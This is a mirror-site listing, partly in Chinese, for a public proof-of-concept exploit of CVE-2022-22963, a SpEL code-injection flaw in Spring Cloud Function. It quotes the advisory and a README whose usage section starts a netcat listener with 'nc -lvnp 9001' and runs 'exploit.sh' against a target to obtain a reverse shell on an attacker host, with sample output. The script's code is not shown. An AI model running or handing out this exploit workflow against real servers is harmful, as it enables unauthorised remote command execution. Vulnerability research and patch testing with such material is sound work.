CVE-2022-22963 PoC — Spring Framework 代码注入漏洞

Source

https://github.com/nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963

Associated Vulnerability

Title:Spring Framework 代码注入漏洞 (CVE-2022-22963)
Description:In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.

Description

Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function

Readme

# Exploit for RCE in Spring Cloud (CVE 2022-22963)
Exploit for **CVE-2022-22963** remote command execution in Spring Cloud Function

See for details about the vulnerability [**here**](https://www.fastly.com/blog/spring-has-sprung-breaking-down-cve-2022-22963-and-spring4shell-cve-2022) and [**here**](https://spring.io/security/cve-2022-22963)

## PoC

Run the netcat on your host:
``` 
$ nc -lvnp 9001
``` 

Run the exploit (example) with default port **`9001`** on attacker host:
``` 
$ ./exploit.sh site.com 10.10.14.122
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:9001
[*] Done
```
Run the exploit (example) with the specified port **`1337`** on attacker host:
``` 
$ ./exploit.sh site.com 10.10.14.122 1337
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:1337
[*] Done
```

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!